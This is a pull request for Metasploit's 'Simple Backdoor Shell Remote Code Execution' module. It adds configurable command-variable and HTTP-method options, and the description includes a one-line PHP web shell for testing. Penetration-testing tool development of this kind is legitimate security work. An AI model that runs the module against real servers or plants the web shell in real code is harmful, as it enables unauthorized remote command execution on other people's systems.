### PR TITLE
Allow specifying VAR and METHOD for simple_backdoor_exec

### DIFF
--- a/modules/exploits/multi/http/simple_backdoors_exec.rb
+++ b/modules/exploits/multi/http/simple_backdoors_exec.rb
@@ -53,6 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [true, 'The path of a backdoor shell', 'cmd.php']),
+        OptString.new('VAR', [true, 'The command variable', 'cmd']),
       ],self.class)
   end
 
@@ -70,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'method'   => 'GET',
       'uri'      => normalize_uri(target_uri.path),
       'vars_get' => {
-        'cmd' => cmd
+        datastore['VAR'] => cmd
       }
     })
     unless res && res.code == 200

--- a/modules/exploits/multi/http/simple_backdoors_exec.rb
+++ b/modules/exploits/multi/http/simple_backdoors_exec.rb
@@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
       [
         OptString.new('TARGETURI', [true, 'The path of a backdoor shell', 'cmd.php']),
         OptString.new('VAR', [true, 'The command variable', 'cmd']),
-        OptString.new('METHOD', [true, 'The method to use', 'GET']),
+        OptEnum.new('METHOD', [true, 'HTTP Method', 'GET', ['GET', 'POST', 'PUT']])
       ],self.class)
   end
 

--- a/modules/exploits/multi/http/simple_backdoors_exec.rb
+++ b/modules/exploits/multi/http/simple_backdoors_exec.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Name'           => 'Simple Backdoor Shell Remote Code Execution',
       'Description'    => %q{
         This module exploits unauthenticated simple web backdoor shells by leveraging the
-        common backdoor shell's CMD parameter  to execute commands. The SecLists project of
+        common backdoor shell's vulnerable parameter  to execute commands. The SecLists project of
         Daniel Miessler and Jason Haddix has a lot of samples for these kind of backdoor shells
         which is categorized under Payloads.
       },
@@ -54,6 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
       [
         OptString.new('TARGETURI', [true, 'The path of a backdoor shell', 'cmd.php']),
         OptString.new('VAR', [true, 'The command variable', 'cmd']),
+        OptString.new('METHOD', [true, 'The method to use', 'GET']),
       ],self.class)
   end
 
@@ -68,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def http_send_command(cmd)
     res = send_request_cgi({
-      'method'   => 'GET',
+      'method'   => datastore['METHOD'],
       'uri'      => normalize_uri(target_uri.path),
       'vars_get' => {
         datastore['VAR'] => cmd


### PR DESCRIPTION
Adds the `VAR` and `METHOD` arguments to `modules/exploits/multi/http/simple_backdoors_exec.rb`.

The defaults are the same.

For testing purposes the following can be used:

```
<?php passthru($_REQUEST['c']); ?>
```
